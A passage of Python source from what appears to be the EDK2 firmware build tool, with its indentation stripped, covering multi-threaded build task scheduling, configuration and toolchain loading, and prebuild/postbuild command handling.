"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, BuildCommand,Target):
Dependency = [ModuleMakeUnit(La, BuildCommand,Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, BuildCommand, Target):
Dependency = [ModuleMakeUnit(Lib, BuildCommand, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, BuildCommand,Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.name = "Build-Task-Scheduler"
SchedulerThread.daemon = False
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.is_set()) and not BuildTask._ErrorFlag.is_set():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = list(BuildTask._PendingQueue.keys())
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.is_set():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.is_set():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.is_set() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.name for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.is_set()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.is_set()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule and not Dep.BuildObject.CanSkipbyCache(GlobalData.gModuleCacheHit):
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir,self.BuildItem.BuildObject)
self.CompleteFlag = True
# Run hash operation post dependency to account for libs
# Run if --hash or --binary-destination
if GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
self.BuildItem.BuildObject.GenModuleHash()
if GlobalData.gBinCacheDest:
self.BuildItem.BuildObject.GenCMakeHash()
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.is_set():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.current_thread().name, Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.name = "build thread"
self.BuildTread.daemon = False
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions,log_q):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = 1
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
self.MakeFileName = ""
TargetObj = TargetTxtDict()
ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"),"Conf")))
self.TargetTxt = TargetObj.Target
self.ToolDef = ToolDefObj.ToolDef
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = not BuildOptions.NoGenfdsMultiThread
GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
GlobalData.gDatabasePath = os.path.normpath(os.path.join(GlobalData.gConfDirectory, GlobalData.gDatabasePath))
if not os.path.exists(os.path.join(GlobalData.gConfDirectory, '.cache')):
os.makedirs(os.path.join(GlobalData.gConfDirectory, '.cache'))
self.Db = BuildDB
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
if "PYTHON3_ENABLE" in os.environ:
PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
if PYTHON3_ENABLE != "TRUE":
PYTHON3_ENABLE = "FALSE"
EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
if "PYTHON_COMMAND" in os.environ:
EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
TargetObj = TargetTxtDict()
ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"), "Conf")))
self.TargetTxt = TargetObj.Target
self.ToolDef = ToolDefObj.ToolDef
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
self.AutoGenMgr = None
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
self.log_q = log_q
GlobalData.file_lock = mp.Lock()
# Init cache data for local only
GlobalData.gPackageHashFile = dict()
GlobalData.gModulePreMakeCacheStatus = dict()
GlobalData.gModuleMakeCacheStatus = dict()
GlobalData.gHashChainStatus = dict()
GlobalData.gCMakeHashFile = dict()
GlobalData.gModuleHashFile = dict()
GlobalData.gFileHashDict = dict()
GlobalData.gModuleAllCacheStatus = set()
GlobalData.gModuleCacheHit = set()
def StartAutoGen(self,mqueue, DataPipe,SkipAutoGen,PcdMaList,cqueue):
try:
if SkipAutoGen:
return True,0
feedback_q = mp.Queue()
error_event = mp.Event()
FfsCmd = DataPipe.Get("FfsCommand")
if FfsCmd is None:
FfsCmd = {}
GlobalData.FfsCmd = FfsCmd
auto_workers = [AutoGenWorkerInProcess(mqueue,DataPipe.dump_file,feedback_q,GlobalData.file_lock,cqueue,self.log_q,error_event) for _ in range(self.ThreadNumber)]
self.AutoGenMgr = AutoGenManager(auto_workers,feedback_q,error_event)
self.AutoGenMgr.start()
for w in auto_workers:
w.start()
if PcdMaList is not None:
for PcdMa in PcdMaList:
# SourceFileList calling sequence impact the makefile string sequence.
# Create cached SourceFileList here to unify its calling sequence for both
# CanSkipbyPreMakeCache and CreateCodeFile/CreateMakeFile.
RetVal = PcdMa.SourceFileList
# Force cache miss for PCD driver
if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "PreMakeCache", False))
PcdMa.CreateCodeFile(False)
PcdMa.CreateMakeFile(False,GenFfsList = DataPipe.Get("FfsCommand").get((PcdMa.MetaFile.Path, PcdMa.Arch),[]))
PcdMa.CreateAsBuiltInf()
# Force cache miss for PCD driver
if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "MakeCache", False))
self.AutoGenMgr.join()
rt = self.AutoGenMgr.Status
err = 0
if not rt:
err = UNKNOWN_ERROR
return rt, err
except FatalError as e:
return False, e.args[0]
except:
return False, UNKNOWN_ERROR
## Add TOOLCHAIN and FAMILY declared in DSC [BuildOptions] to ToolsDefTxtDatabase.
#
# Loop through the set of build targets, tool chains, and archs provided on either
# the command line or in target.txt to discover FAMILY and TOOLCHAIN delclarations
# in [BuildOptions] sections that may be within !if expressions that may use
# $(TARGET), $(TOOLCHAIN), $(TOOLCHAIN_TAG), or $(ARCH) operands.
#
def GetToolChainAndFamilyFromDsc (self, File):
SavedGlobalDefines = GlobalData.gGlobalDefines.copy()
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for BuildToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = BuildToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = BuildToolChain
for BuildArch in self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = BuildArch
dscobj = self.BuildDatabase[File, BuildArch]
for KeyFamily, Key, KeyCodeBase in dscobj.BuildOptions:
try:
Target, ToolChain, Arch, Tool, Attr = Key.split('_')
except:
continue
if ToolChain == TAB_STAR or Attr != TAB_TOD_DEFINES_FAMILY:
continue
try:
Family = dscobj.BuildOptions[(KeyFamily, Key, KeyCodeBase)]
Family = Family.strip().strip('=').strip()
except:
continue
if TAB_TOD_DEFINES_FAMILY not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY] = {}
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][ToolChain] = Family
if TAB_TOD_DEFINES_BUILDRULEFAMILY not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY] = {}
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][ToolChain] = Family
if TAB_TOD_DEFINES_TOOL_CHAIN_TAG not in self.ToolDef.ToolsDefTxtDatabase:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] = []
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG].append(ToolChain)
GlobalData.gGlobalDefines = SavedGlobalDefines
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
self.GetToolChainAndFamilyFromDsc (self.PlatformFile)
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
self.ThreadNumber = ThreadNum()
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
